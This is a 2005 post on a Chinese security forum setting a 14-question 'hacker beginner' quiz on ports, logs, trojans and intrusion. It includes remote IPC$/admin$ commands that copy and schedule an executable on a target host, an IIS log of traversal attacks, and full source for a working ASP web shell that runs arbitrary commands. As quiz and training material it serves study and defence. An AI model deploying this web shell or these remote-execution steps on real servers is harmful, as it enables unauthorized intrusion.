论坛: 菜鸟乐园 标题: 一份黑客菜鸟试卷,欢迎各位朋友作答 复制本贴地址    
作者: xp0710 [xp0710]    论坛用户   登录
一、 http://192.168.0.1 http://xyz.3322.org http://3232235521
三个连接指向同一目标网站,那么它们分别是什么意义?

二、
常用端口识别
20 21 23
25 80 110
139 443 445

三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32

四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe

五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。

六、
netstat命令有何作用,举出两个参数进行说明。

七、
试述木马的一些基本特征。

八、
如何利用脚本实现对ftp的自动操作?

九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分)
那么,如何在不打补丁的情况下避免这种攻击的发生?

十一、OSI模型中哪一层上有协议?分别是什么?

十二、观察ping命令的返回包的TTL值,可以了解到什么?

十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?

十四、谈谈你对hacker和网络安全的认识

地主 发表时间: 05-05-27 16:53

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号